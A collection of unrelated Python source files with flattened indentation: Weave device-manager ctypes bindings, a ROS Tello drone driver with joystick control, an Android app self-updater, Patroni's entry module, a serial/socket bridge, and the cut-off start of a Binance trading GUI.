_dmLib.nl_Weave_DeviceManager_GetLogFilter.argtypes = [ ]
_dmLib.nl_Weave_DeviceManager_GetLogFilter.restype = c_uint8
_dmLib.nl_Weave_DeviceManager_SetLogFilter.argtypes = [ c_uint8 ]
_dmLib.nl_Weave_DeviceManager_SetLogFilter.restype = None
_dmLib.nl_Weave_DeviceManager_CloseEndpoints.argtypes = [ ]
_dmLib.nl_Weave_DeviceManager_CloseEndpoints.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_StartSystemTest.argtypes = [ c_void_p, c_uint32, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_StartSystemTest.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_StopSystemTest.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_StopSystemTest.restype = c_uint32
res = _dmLib.nl_Weave_DeviceManager_Init()
if (res != 0):
raise self._ErrorToException(res)
def _CallDevMgr(self, callFunct):
# throw error if op in progress
self.callbackRes = None
self.completeEvent.clear()
with self.networkLock:
res = callFunct()
self.completeEvent.set()
return res
def _CallDevMgrAsync(self, callFunct):
# throw error if op in progress
self.callbackRes = None
self.completeEvent.clear()
with self.networkLock:
res = callFunct()
if (res != 0):
self.completeEvent.set()
raise self._ErrorToException(res)
while (not self.completeEvent.isSet()):
if self.blockingCB:
self.blockingCB()
self.completeEvent.wait(0.05)
if (isinstance(self.callbackRes, DeviceManagerException)):
raise self.callbackRes
return self.callbackRes
def _ErrorToException(self, err, devStatusPtr=None):
if (err == 4044 and devStatusPtr):
devStatus = devStatusPtr.contents
msg = _CStringToString(_dmLib.nl_Weave_DeviceManager_StatusReportToString(devStatus.ProfileId, devStatus.StatusCode))
sysErrorCode = devStatus.SysErrorCode if (devStatus.SysErrorCode != 0) else None
if (sysErrorCode != None):
msg = msg + " (system err %d)" % (sysErrorCode)
return DeviceError(devStatus.ProfileId, devStatus.StatusCode, sysErrorCode, msg)
else:
return DeviceManagerError(err, _CStringToString(_dmLib.nl_Weave_DeviceManager_ErrorToString(err)))
def NetworkTypeToString(val):
if (val == NetworkType_WiFi):
return "WiFi"
if (val == NetworkType_Thread):
return "Thread"
if (val != None):
return "UNKNOWN (" + str(val)+ ")"
return None
def ParseNetworkType(val):
if isinstance(val, six.integer_types):
return val
val = val.lower()
if (val == "wifi"):
return NetworkType_WiFi
if (val == "thread"):
return NetworkType_Thread
raise Exception("Invalid network type: " + str(val))
def WiFiModeToString(val):
if (val == WiFiMode_AdHoc):
return "AdHoc"
if (val == WiFiMode_Managed):
return "Managed"
if (val != None):
return "Unknown (" + str(val)+ ")"
return None
def ParseWiFiMode(val):
if isinstance(val, six.integer_types):
return val
val = val.lower()
if (val == "adhoc" or val == "ad-hoc"):
return WiFiMode_AdHoc
if (val == "managed"):
return WiFiMode_Managed
raise Exception("Invalid Wifi mode: " + str(val))
def WiFiRoleToString(val):
if (val == WiFiRole_Station):
return "Station"
if (val == WiFiRole_AccessPoint):
return "AccessPoint"
if (val != None):
return "Unknown (" + str(val)+ ")"
return None
def ParseWiFiRole(val):
if isinstance(val, six.integer_types):
return val
val = val.lower()
if (val == "station"):
return WiFiRole_Station
if (val == "accesspoint" or val == "access-point"):
return WiFiRole_AccessPoint
raise Exception("Invalid Wifi role: " + str(val))
def WiFiSecurityTypeToString(val):
if (val == WiFiSecurityType_None):
return "None"
if (val == WiFiSecurityType_WEP):
return "WEP"
if (val == WiFiSecurityType_WPAPersonal):
return "WPA"
if (val == WiFiSecurityType_WPA2Personal):
return "WPA2"
if (val == WiFiSecurityType_WPA2MixedPersonal):
return "WPA2Mixed"
if (val == WiFiSecurityType_WPAEnterprise):
return "WPAEnterprise"
if (val == WiFiSecurityType_WPA2Enterprise):
return "WPA2Enterprise"
if (val == WiFiSecurityType_WPA2MixedEnterprise):
return "WPA2MixedEnterprise"
if (val != None):
return "Unknown (" + str(val)+ ")"
return None
def ParseSecurityType(val):
val = val.lower()
if (val == 'none'):
return WiFiSecurityType_None
if (val == 'wep'):
return WiFiSecurityType_WEP
if (val == 'wpa' or val == 'wpapersonal' or val == 'wpa-personal'):
return WiFiSecurityType_WPAPersonal
if (val == 'wpa2' or val == 'wpa2personal' or val == 'wpa2-personal'):
return WiFiSecurityType_WPA2Personal
if (val == 'wpa2mixed' or val == 'wpa2-mixed' or val == 'wpa2mixedpersonal' or val == 'wpa2-mixed-personal'):
return WiFiSecurityType_WPA2MixedPersonal
if (val == 'wpaenterprise' or val == 'wpa-enterprise'):
return WiFiSecurityType_WPAEnterprise
if (val == 'wpa2enterprise' or val == 'wpa2-enterprise'):
return WiFiSecurityType_WPA2Enterprise
if (val == 'wpa2mixedenterprise' or val == 'wpa2-mixed-enterprise'):
return WiFiSecurityType_WPA2MixedEnterprise
raise Exception("Invalid Wifi security type: " + str(val))
def DeviceFeatureToString(val):
if (val == DeviceFeature_HomeAlarmLinkCapable):
return "HomeAlarmLinkCapable"
if (val == DeviceFeature_LinePowered):
return "LinePowered"
return "0x%08X" % (val)
|
drivers.py
|
#!/usr/bin/env python
#Ros utilites
import threading
import rospy
from geometry_msgs.msg import Point, Pose, Quaternion, Twist
from sensor_msgs.msg import Image, CompressedImage, Imu
from std_msgs.msg import Empty
from tello_msgs.msg import FlightData
from cv_bridge import CvBridge, CvBridgeError
from nav_msgs.msg import Odometry
from tf.transformations import euler_from_quaternion, quaternion_from_euler
#Python Utilities
import av
import cv2
import numpy as np
import tellopy
from copy import deepcopy
from math import *
import time
import pygame
import pygame.locals
fpv = [960, 720]
# Helpers
from helpers.control import Control
control = Control()
from helpers.rc import JoystickPS4
ps4_js = JoystickPS4()
from helpers.cvlib import Detection
detection = Detection()
buttons = None
speed = 100
throttle = 0.0
yaw = 0.0
pitch = 0.0
roll = 0.0
class TelloDriver(object):
def __init__(self):
# Connect to the drone
self._drone = tellopy.Tello()
self._drone.connect()
self._drone.wait_for_connection(10.0)
# Init
rospy.init_node('tello_driver_node', anonymous=False)
self.current_yaw = 0.0
self.rate = rospy.Rate(30)
self._cv_bridge = CvBridge()
self.pose = Pose()
self.frame = None
self.centroids = []
self.drone_position = None
self.height = 0
# ROS publishers
self._flight_data_pub = rospy.Publisher('/tello/flight_data', FlightData, queue_size=10)
self._image_pub = rospy.Publisher('/tello/camera/image_raw', Image, queue_size=10)
self.pub_odom = rospy.Publisher('/tello/odom', Odometry, queue_size=10, latch=True)
self.pub_imu= rospy.Publisher('/tello/imu', Imu, queue_size=10, latch=True)
# ROS subscribers
self._drone.subscribe(self._drone.EVENT_FLIGHT_DATA, self.flight_data_callback)
self._drone.subscribe(self._drone.EVENT_LOG_DATA, self.cb_data_log)
#rospy.Subscriber("/aiming/target_point", Point, self.point_callback)
# Drone start fly
#self._drone.takeoff()
#Drone controller PS4
global buttons
pygame.init()
pygame.joystick.init()
try:
js = pygame.joystick.Joystick(0)
js.init()
js_name = js.get_name()
buttons = ps4_js
except pygame.error:
pass
# Start video thread
self._stop_request = threading.Event()
video_thread = threading.Thread(target=self.video_worker)
video_thread.start()
rospy.on_shutdown(self.shutdown)
while not rospy.is_shutdown():
for e in pygame.event.get():
self.handle_input_event(self._drone, e)
if self.frame is not None:
start_time = time.time()
frame = deepcopy(self.frame)
self.centroids = detection.detect(frame)
if len(self.centroids)==0:
continue
else:
cent = self.centroids[0]
rospy.loginfo('cent %s', cent)
yaw_angle = control.yaw(cent)
try:
rospy.loginfo('yaw_angle %s', yaw_angle)
self._drone.clockwise(yaw_angle)
#self.pose.position = drone_position
#self.pose.orientation = Quaternion(*quaternion_from_euler(0.0, 0.0, yaw_angle*pi/180))
#print(self.pose)
#self.pub_odom.pose.publish(self.pose)
except rospy.ServiceException:
pass
cv2.circle(frame, (480, cent[1]), 3, [0,0,255], -1, cv2.LINE_AA) #red
cv2.circle(frame, (cent[0], cent[1]), 3, [0,255,0], -1, cv2.LINE_AA) #green
cv2.imshow("", frame)
cv2.waitKey(1)
#print("%s seconds" % (time.time() - start_time))
#time.sleep((time.time() - start_time)) #slows down twice dont do it
self.rate.sleep()
def video_worker(self):
container = av.open(self._drone.get_video_stream())
rospy.loginfo('starting video pipeline')
for frame in container.decode(video=0):
try:
color = cv2.cvtColor(np.array(frame.to_image()), cv2.COLOR_RGB2BGR)
color_mat = cv2.cvtColor(np.array(frame.to_image()), cv2.COLOR_RGB2BGR)
self._image_pub.publish(self._cv_bridge.cv2_to_imgmsg(color_mat, 'bgr8'))
except CvBridgeError as e:
print(e)
self.frame = color_mat
if self._stop_request.isSet():
return
#def point_callback(self,data):
# self.centroids = [int(data.x), int(data.y)]
def flight_data_callback(self, event, sender, data, **args):
flight_data = FlightData()
flight_data.battery_percent = data.battery_percentage
flight_data.estimated_flight_time_remaining = data.drone_fly_time_left / 10.
flight_data.flight_mode = data.fly_mode
flight_data.flight_time = data.fly_time
flight_data.east_speed = -1. if data.east_speed > 30000 else data.east_speed / 10.
flight_data.north_speed = -1. if data.north_speed > 30000 else data.north_speed / 10.
flight_data.ground_speed = -1. if data.ground_speed > 30000 else data.ground_speed / 10.
flight_data.altitude = -1. if data.height > 30000 else data.height / 10.
flight_data.equipment = data.electrical_machinery_state
flight_data.high_temperature = data.temperature_height
self._flight_data_pub.publish(flight_data)
def shutdown(self):
self._stop_request.set()
self._drone.land()
self._drone.quit()
self._drone = None
def cb_data_log(self, event, sender, data, **args):
time_cb = rospy.Time.now()
odom_msg = Odometry()
odom_msg.child_frame_id = rospy.get_namespace() + 'base_link'
odom_msg.header.stamp = time_cb
odom_msg.header.frame_id = rospy.get_namespace() + 'local_origin'
# Height from MVO received as negative distance to floor
odom_msg.pose.pose.position.z = -data.mvo.pos_z #self.height #-data.mvo.pos_z
odom_msg.pose.pose.position.x = data.mvo.pos_x
odom_msg.pose.pose.position.y = data.mvo.pos_y
odom_msg.pose.pose.orientation.w = data.imu.q0
odom_msg.pose.pose.orientation.x = data.imu.q1
odom_msg.pose.pose.orientation.y = data.imu.q2
odom_msg.pose.pose.orientation.z = data.imu.q3
#self.drone_position = odom_msg.pose.pose.position
# Linear speeds from MVO received in dm/sec
odom_msg.twist.twist.linear.x = data.mvo.vel_y/10
odom_msg.twist.twist.linear.y = data.mvo.vel_x/10
odom_msg.twist.twist.linear.z = -data.mvo.vel_z/10
odom_msg.twist.twist.angular.x = data.imu.gyro_x
odom_msg.twist.twist.angular.y = data.imu.gyro_y
odom_msg.twist.twist.angular.z = data.imu.gyro_z
self.pub_odom.publish(odom_msg)
imu_msg = Imu()
imu_msg.header.stamp = time_cb
imu_msg.header.frame_id = rospy.get_namespace() + 'base_link'
imu_msg.orientation.w = data.imu.q0
imu_msg.orientation.x = data.imu.q1
imu_msg.orientation.y = data.imu.q2
imu_msg.orientation.z = data.imu.q3
imu_msg.angular_velocity.x = data.imu.gyro_x
imu_msg.angular_velocity.y = data.imu.gyro_y
imu_msg.angular_velocity.z = data.imu.gyro_z
imu_msg.linear_acceleration.x = data.imu.acc_x
imu_msg.linear_acceleration.y = data.imu.acc_y
imu_msg.linear_acceleration.z = data.imu.acc_z
self.pub_imu.publish(imu_msg)
def update(self,old, new, max_delta=0.3):
if abs(old - new) <= max_delta:
res = new
else:
res = 0.0
return res
def handle_input_event(self, drone, e):
global speed
global throttle
global yaw
global pitch
global roll
if e.type == pygame.locals.JOYAXISMOTION:
# ignore small input values (Deadzone)
if -buttons.DEADZONE <= e.value and e.value <= buttons.DEADZONE:
e.value = 0.0
if e.axis == buttons.LEFT_Y:
throttle = self.update(throttle, e.value * buttons.LEFT_Y_REVERSE)
drone.set_throttle(throttle)
if e.axis == buttons.LEFT_X:
yaw = self.update(yaw, e.value * buttons.LEFT_X_REVERSE)
drone.set_yaw(yaw)
if e.axis == buttons.RIGHT_Y:
pitch = self.update(pitch, e.value * buttons.RIGHT_Y_REVERSE)
drone.set_pitch(pitch)
if e.axis == buttons.RIGHT_X:
roll = self.update(roll, e.value * buttons.RIGHT_X_REVERSE)
drone.set_roll(roll)
elif e.type == pygame.locals.JOYHATMOTION:
if e.value[0] < 0:
drone.counter_clockwise(speed)
if e.value[0] == 0:
drone.clockwise(0)
if e.value[0] > 0:
drone.clockwise(speed)
if e.value[1] < 0:
drone.down(speed)
if e.value[1] == 0:
drone.up(0)
if e.value[1] > 0:
drone.up(speed)
elif e.type == pygame.locals.JOYBUTTONDOWN:
if e.button == buttons.LAND:
drone.land()
elif e.button == buttons.UP:
drone.up(speed)
elif e.button == buttons.DOWN:
drone.down(speed)
elif e.button == buttons.ROTATE_RIGHT:
drone.clockwise(speed)
elif e.button == buttons.ROTATE_LEFT:
drone.counter_clockwise(speed)
elif e.button == buttons.FORWARD:
drone.forward(speed)
elif e.button == buttons.BACKWARD:
drone.backward(speed)
elif e.button == buttons.RIGHT:
drone.right(speed)
elif e.button == buttons.LEFT:
drone.left(speed)
elif e.type == pygame.locals.JOYBUTTONUP:
if e.button == buttons.TAKEOFF:
if throttle != 0.0:
print('###')
print('### throttle != 0.0 (This may hinder the drone from taking off)')
print('###')
drone.takeoff()
elif e.button == buttons.UP:
drone.up(0)
elif e.button == buttons.DOWN:
drone.down(0)
elif e.button == buttons.ROTATE_RIGHT:
drone.clockwise(0)
elif e.button == buttons.ROTATE_LEFT:
drone.counter_clockwise(0)
elif e.button == buttons.FORWARD:
drone.forward(0)
elif e.button == buttons.BACKWARD:
drone.backward(0)
elif e.button == buttons.RIGHT:
drone.right(0)
elif e.button == buttons.LEFT:
drone.left(0)
def main():
try:
TelloDriver()
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
|
service.py
|
import os
import traceback
import urllib2
from threading import Thread, Event
from time import sleep, time
from jnius import autoclass
import subprocess
from kivy.lib import osc
from pyupdater import SERVICE_PORT, CLIENT_PORT, SERVICE_PATH, MESSAGE_UPDATE_AVAILABLE, MESSAGE_DO_UPDATE, \
MESSAGE_CHECK_FOR_UPDATE
from pyupdater.util import get_current_version, mContext, check_for_root
Environment = autoclass('android.os.Environment')
Intent = autoclass('android.content.Intent')
Uri = autoclass('android.net.Uri')
File = autoclass('java.io.File')
class UpdateFailedException(Exception):
def __init__(self, output):
reason = 'FAILED'
if isinstance(output, basestring):
output = output.strip()
if output[-1] == ']' and '[' in output:
reason = output[output.rindex('[') + 1:-1]
else:
output = str(output)
self.output = output
self.reason = reason
super(UpdateFailedException, self).__init__(reason)
class Updater(object):
def __init__(self, updateurl, frequency=600, root='available', restart=True, root_scriptdir='/cache',
restart_activity='org.renpy.android.PythonActivity'):
print 'updater init'
self.updateurl = updateurl
self.dlthread = None
self.dlready = Event()
self.available_version = None
self.available_version_number = ''
self.current_version = None
self.downloaded_version = None
self.frequency = frequency
self.last_check = None
self.downloadurl = None
self.downloadfile = None
self.root = root if root == 'available' else bool(root)
self.restart = bool(restart)
self.root_scriptdir = root_scriptdir
self.restart_activity = restart_activity
def get_current_version(self):
print 'getting current version...'
version_code = get_current_version()
print 'current version =', version_code
return version_code
def run(self):
print 'updater run'
osc.init()
oscid = osc.listen('127.0.0.1', SERVICE_PORT)
osc.bind(oscid, self.recv_osc, SERVICE_PATH)
print 'listening for OSC'
self.current_version = self.downloaded_version = self.get_current_version()
while True:
if not self.last_check or (self.last_check + self.frequency) < time():
if self.check_for_update():
self.download_update()
if self.dlready.is_set():
self.notify_client()
self.dlready.clear()
osc.readQueue(oscid)
sleep(.1)
def check_for_update(self):
try:
print 'checking for updates at', self.updateurl
print 'last checked:', str(self.last_check)
response = urllib2.urlopen(self.updateurl)
version_code, version_number, dlurl = response.read().split(',')
response.close()
self.available_version = int(version_code)
self.available_version_number = version_number
self.downloadurl = dlurl
print 'found version', self.available_version, '(current version %d)' % self.current_version
return self.available_version > self.downloaded_version
except Exception:
print 'check for update failed!'
traceback.print_exc()
return False
finally:
self.last_check = time()
print 'update last checked:', str(self.last_check)
def download_update(self):
if self.dlthread and self.dlthread.is_alive():
print 'download already in progress!'
return
print 'starting download in thread'
self.dlthread = Thread(name='dlthread', target=self._download)
self.dlthread.run()
def _download(self):
fd = None
print 'downloading', self.downloadurl
self.dlready.clear()
try:
response = urllib2.urlopen(self.downloadurl)
update = response.read()
response.close()
dlfile = os.path.join(Environment.getExternalStorageDirectory().getPath(), 'py4aupdate.apk')
with open(dlfile, 'w') as f:
f.write(update)
self.downloadfile = dlfile
print 'download successful'
self.downloaded_version = self.available_version
self.dlready.set()
except Exception:
print 'download failed!'
traceback.print_exc()
def notify_client(self):
osc.sendMsg(SERVICE_PATH, [MESSAGE_UPDATE_AVAILABLE, self.available_version, self.available_version_number], port=CLIENT_PORT)
def recv_osc(self, message, *args):
print 'service osc message:', message, args
command = message[2]
if command == MESSAGE_DO_UPDATE:
self.update()
elif command == MESSAGE_CHECK_FOR_UPDATE:
if self.check_for_update():
self.download_update()
def update(self, ignore_exceptions=False):
if not self.available_version:
print 'no updates found!'
return
if not self.downloadfile:
print 'update not downloaded!'
return
print 'starting update to', self.available_version, 'from', self.downloadfile
try:
if self.root and self.root_binary:
self.root_install()
elif self.root is True:
raise UpdateFailedException('root not available')
else:
self.normal_install()
except Exception:
if ignore_exceptions:
print 'update failed'
traceback.print_exc()
else:
raise
def normal_install(self):
print 'performing standard install'
dluri = Uri.fromFile(File(self.downloadfile))
intent = Intent(Intent.ACTION_VIEW)
intent.setDataAndType(dluri, 'application/vnd.android.package-archive')
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
mContext().startActivity(intent)
def run_root(self, cmdline):
cmd = [self.root_binary, '-c', cmdline]
print 'running', cmd
return subprocess.check_output(cmd)
def root_install(self):
print 'performing root install'
scriptfilesd = os.path.join(Environment.getExternalStorageDirectory().getPath(), 'py4aupdate.sh')
scriptfile = os.path.join('/cache', 'py4aupdate.sh')
with open(scriptfilesd, 'w') as f:
f.write('(pm install -r %s | tee /proc/self/fd/2 | grep -q Success) 2>&1 || exit 1\n' % self.downloadfile)
f.write('rm -f %s\n' % self.downloadfile)
f.write('rm -f %s\n' % scriptfile)
if self.restart:
appname = mContext().getPackageName()
f.write('am start -n %s/%s\n' % (appname, self.restart_activity))
print self.run_root('cp %s %s' % (scriptfilesd, scriptfile))
print self.run_root('chmod 0777 %s' % scriptfile)
os.unlink(scriptfilesd)
try:
output = self.run_root('sh %s' % scriptfile)
# service should be killed on update, if we're still running it's an error
print 'install failed:'
print output
raise UpdateFailedException(output)
except UpdateFailedException:
raise
except Exception, e:
print 'install failed:'
if hasattr(e, 'output') and e.output:
print e.output
raise UpdateFailedException(e.output)
else:
traceback.print_exc()
print '(no command output)'
raise UpdateFailedException(e)
@property
def root_binary(self):
if not hasattr(self, '_root_binary'):
self._root_binary = check_for_root()
return self._root_binary
def restart_app(self):
print 'restarting app'
app = mContext()
context = app.getBaseContext()
intent = context.getPackageManager().getLaunchIntentForPackage(context.getPackageName())
intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TOP)
app.startActivity(intent)
print 'app activity launched'
|
__init__.py
|
import logging
import os
import signal
import sys
import time
logger = logging.getLogger(__name__)
class Patroni(object):
def __init__(self):
from patroni.api import RestApiServer
from patroni.config import Config
from patroni.dcs import get_dcs
from patroni.ha import Ha
from patroni.log import PatroniLogger
from patroni.postgresql import Postgresql
from patroni.version import __version__
from patroni.watchdog import Watchdog
self.setup_signal_handlers()
self.version = __version__
self.logger = PatroniLogger()
self.config = Config()
self.logger.reload_config(self.config.get('log', {}))
self.dcs = get_dcs(self.config)
self.watchdog = Watchdog(self.config)
self.load_dynamic_configuration()
self.postgresql = Postgresql(self.config['postgresql'])
self.api = RestApiServer(self, self.config['restapi'])
self.ha = Ha(self)
self.tags = self.get_tags()
self.next_run = time.time()
self.scheduled_restart = {}
def load_dynamic_configuration(self):
from patroni.exceptions import DCSError
while True:
try:
cluster = self.dcs.get_cluster()
if cluster and cluster.config and cluster.config.data:
if self.config.set_dynamic_configuration(cluster.config):
self.dcs.reload_config(self.config)
self.watchdog.reload_config(self.config)
elif not self.config.dynamic_configuration and 'bootstrap' in self.config:
if self.config.set_dynamic_configuration(self.config['bootstrap']['dcs']):
self.dcs.reload_config(self.config)
break
except DCSError:
logger.warning('Can not get cluster from dcs')
time.sleep(5)
def get_tags(self):
return {tag: value for tag, value in self.config.get('tags', {}).items()
if tag not in ('clonefrom', 'nofailover', 'noloadbalance', 'nosync') or value}
@property
def nofailover(self):
return bool(self.tags.get('nofailover', False))
@property
def nosync(self):
return bool(self.tags.get('nosync', False))
def reload_config(self):
try:
self.tags = self.get_tags()
self.logger.reload_config(self.config.get('log', {}))
self.dcs.reload_config(self.config)
self.watchdog.reload_config(self.config)
self.api.reload_config(self.config['restapi'])
self.postgresql.reload_config(self.config['postgresql'])
except Exception:
logger.exception('Failed to reload config_file=%s', self.config.config_file)
@property
def replicatefrom(self):
return self.tags.get('replicatefrom')
def sighup_handler(self, *args):
self._received_sighup = True
def sigterm_handler(self, *args):
with self._sigterm_lock:
if not self._received_sigterm:
self._received_sigterm = True
sys.exit()
@property
def noloadbalance(self):
return bool(self.tags.get('noloadbalance', False))
def schedule_next_run(self):
self.next_run += self.dcs.loop_wait
current_time = time.time()
nap_time = self.next_run - current_time
if nap_time <= 0:
self.next_run = current_time
# Release the GIL so we don't starve anyone waiting on async_executor lock
time.sleep(0.001)
# Warn user that Patroni is not keeping up
logger.warning("Loop time exceeded, rescheduling immediately.")
elif self.ha.watch(nap_time):
self.next_run = time.time()
@property
def received_sigterm(self):
with self._sigterm_lock:
return self._received_sigterm
def run(self):
self.api.start()
self.next_run = time.time()
while not self.received_sigterm:
if self._received_sighup:
self._received_sighup = False
if self.config.reload_local_configuration():
self.reload_config()
logger.info(self.ha.run_cycle())
if self.dcs.cluster and self.dcs.cluster.config and self.dcs.cluster.config.data \
and self.config.set_dynamic_configuration(self.dcs.cluster.config):
self.reload_config()
if self.postgresql.role != 'uninitialized':
self.config.save_cache()
self.schedule_next_run()
def setup_signal_handlers(self):
from threading import Lock
self._received_sighup = False
self._sigterm_lock = Lock()
self._received_sigterm = False
if os.name != 'nt':
signal.signal(signal.SIGHUP, self.sighup_handler)
signal.signal(signal.SIGTERM, self.sigterm_handler)
def shutdown(self):
with self._sigterm_lock:
self._received_sigterm = True
try:
self.api.shutdown()
except Exception:
logger.exception('Exception during RestApi.shutdown')
self.ha.shutdown()
def patroni_main():
patroni = Patroni()
try:
patroni.run()
except KeyboardInterrupt:
pass
finally:
patroni.shutdown()
logging.shutdown()
def main():
if os.getpid() != 1:
return patroni_main()
# Patroni started with PID=1, it looks like we are in the container
pid = 0
# Looks like we are in a docker, so we will act like init
def sigchld_handler(signo, stack_frame):
try:
while True:
ret = os.waitpid(-1, os.WNOHANG)
if ret == (0, 0):
break
elif ret[0] != pid:
logger.info('Reaped pid=%s, exit status=%s', *ret)
except OSError:
pass
def passtochild(signo, stack_frame):
if pid:
os.kill(pid, signo)
if os.name != 'nt':
signal.signal(signal.SIGCHLD, sigchld_handler)
signal.signal(signal.SIGHUP, passtochild)
signal.signal(signal.SIGQUIT, passtochild)
signal.signal(signal.SIGUSR1, passtochild)
signal.signal(signal.SIGUSR2, passtochild)
signal.signal(signal.SIGINT, passtochild)
signal.signal(signal.SIGABRT, passtochild)
signal.signal(signal.SIGTERM, passtochild)
import multiprocessing
patroni = multiprocessing.Process(target=patroni_main)
patroni.start()
pid = patroni.pid
patroni.join()
|
process_worker.py
|
# coding=utf-8
import multiprocessing
import serial
import socket
import os
import fuckargs
# 串口通讯
# 频率的决定者以硬件的串口通讯频率决定
def get_serial_info( input_str ):
os.system( "echo %d >>pid_repo" % os.getpid() ) # store the pid
while True:
if input_str.value.find("$_$") > -1:
print len( input_str.value )
input_json_list, input_str.value = input_str.value[:-3].split("$_$"), ""
for input_json in input_json_list:
print input_json
ser.write( input_json )
# socket server
def socket_server( input_str ):
os.system( "echo %d >>pid_repo" % os.getpid() ) # store the pid
host = fuckargs.get( "host" ) # Symbolic name meaning all available interfaces
port = int( fuckargs.get("port") ) # Arbitrary non-privileged port
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) #定义socket类型,网络通信,TCP
s.bind( (host, port) ) #套接字绑定的IP与端口
s.listen( 5 ) #开始TCP监听
input_str.value = ""
while True:
conn, addr = s.accept() #接受TCP连接,并返回新的套接字与IP地址
# print 'Connected by', addr #输出客户端的IP地址
try:
while True:
data=conn.recv(1024) #把接收的数据实例化
# 如果不为空
if len(data) > 11:
# 阻塞与等待一下吧,目前折中的做法吧
while 1:
will_input_str = input_str.value + data + "$_$"
if len( will_input_str ) < 40000: break
input_str.value = will_input_str
conn.sendall( "done" ) ### 这里暂时约定做“伪回应”
except:
conn.close() #关闭连接
# Main process
ser = serial.Serial( fuckargs.get("usb"), int( fuckargs.get("bits") ) )
string_dict = multiprocessing.Array( "c", "fuck"*10000 ) # 为字符串设置内存大小为40000个字符长度
os.system( "echo %d >>pid_repo" % os.getpid() ) # store the pid
p_serial = multiprocessing.Process( target=get_serial_info, args=(string_dict,) )
p_socket = multiprocessing.Process( target=socket_server, args=(string_dict,) )
p_serial.start()
p_socket.start()
|
iTrader.py
|
from tkinter import *
from tkinter import Menu
from tkinter import ttk
from tkinter.ttk import Combobox
from tkinter import messagebox
import tkinter.font as font
from binance_api import Binance
import threading
import time
import datetime
import os
import os.path
#__Main global variables
ep = False # Exit programm (ExitProgramm)
#__The status of the pressed buttons Button - Deamon process variables
PS1 = False #Timer button_1 state (Start/Stop) true/false
PS_BU = False #Timer button_2 state (Start/Stop) true/false
PS_AB = False #Timer button_AB state (Start/Stop) true/false
PS_OT = False #Timer button_OrdTmr state (Start/Stop) true/false
Ord_Zm = False #Whether to display the Zoom of orders - button_Ord state (Zoom/Norm) true/false
#__Timers run status - Deamon process variables
should_run_T = False #Timer TICK start true/false
should_run_C = False #Timer CANDLES start true/false
should_run_S = False #Timer CANDLES SUMM start true/false
should_run_BU = False #Timer BTC/USDT watch start true/false
should_run_AB = False #Timer Account Balances watch start true/false
should_run_OT = False #Timer Order Timer start true/false
should_run_OZ = False #Timer Order Zoom start true/false
#__Variables to terminate the program - are all timers stopped
TE_Tck = True
TE_Cnd = True
TE_CndSm = True
TE_BU = True
TE_AB = True
TE_Zm = True
TE_OrdTmr = True
#__API Keys from Binance
API_KEY_s = ''
API_SECRET_s = ''
bot = Binance(API_KEY='', API_SECRET='')
isAcc = False
sys_msg = ''
yI=0
y0I_TP=0
yM=0
Lo=0
TT0=0
#__Pair parameters for graphs
GS='CANDLE 5m'
grSmb = 'BNBUSDT' #symbol
Lo=0 #last order number
grSt = 16 #price step
grZm = 500 #Zoom parameter
grOW = 1000 #Parameter for the width of the order candle
prSt = 0.1 #Price step
grH = 1 #Chart hight
grW = 1 #Chart width
grMd = 0.5 #Half the height of the graph
NwOrSw=False
#__Market Parameters
MS = 'SPOT' #FUTURES or SPOT
MPS = 'USDT'
#__Individual parameters of the pair
Lvrg = 1
Lvrg_Tmp = 1
MrgT='NONE'
MrgT_Tmp='NONE'
Isl = True
orLSS=1
#__Position parameters (futures)
PEP = 0
PSP = 0
PPP = 0
PPP_Tmp = 0
PSP_Tmp = 0
PosSide='LONG'
#Order parameters
yI0Zm = 0 #Current price for OrderZoom
#______________Position Parameters (futures)Timer for building a Tick chart
class Timer_Tick:
def __init__(self):
global yI
global Lo
global TE_Tck
while True:
if PS1 == True:
sys_msg = ' The tick chart ' + grSmb + ' is stopped.'
app.Sys_Msg(text1=sys_msg)
TE_Tck = True
break
if should_run_T:
for i in range(400):
if not should_run_T:
sys_msg = ' The tick chart ' + grSmb + ' will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_T:
if i==0:
sys_msg = ' The tick chart ' + grSmb + ' is running.'
app.Sys_Msg(text1=sys_msg)
TE_Tck = False
if i > 0:
time.sleep(0.01)
#Link to view in the browser: https://api.binance.com/api/v1/depth?symbol=ETHBTC
#limit - number of returned records from 5 to 1000 (100 by default).
#Acceptable values: 5, 10, 20, 50, 100, 500, 1000.
#You can also specify 0, but it can return a large number of data.
#The weight depends on the limit parameter. With a limit from 5 to 100, the weight will be equal to 1.
#For the 500 value, the weight will be 5. For the value 1000, the weight will be 10.
#print (grSmb)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=50)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=50)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#print('trades', bot.trades(symbol='BNBUSDT', limit=1))
#If one bought and the other sold, is it "buy" or "sell"?
#I will answer this way: in the binance trading history, transactions with isBuyerMaker == false are highlighted in green,
#and magenta - who has true
#sss41 = "BNBUSDT - trades"
if MS=='SPOT':
myTup12 =('trades', bot.trades(symbol=grSmb, limit=20)) #Tupl
myDicGr1 = myTup12[1][19] #dict
elif MS=='FUTURES':
myTup12 = ('FutTrades', bot.futuresTrades(symbol=grSmb, limit=20)) #tupl
myDicGr1 = myTup12[1][19] #dict
#print(myTup12[1][0])
#print(myTup12[1][19])
if i==0:
yI0=float(myDicGr1['price'])
yI=100
app.graph_1.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
#print (TT0)
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(500,grMd)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,grMd + grSt/2,text="%.2f" % (yI0))
elif 0.1 > prSt >= 0.01:
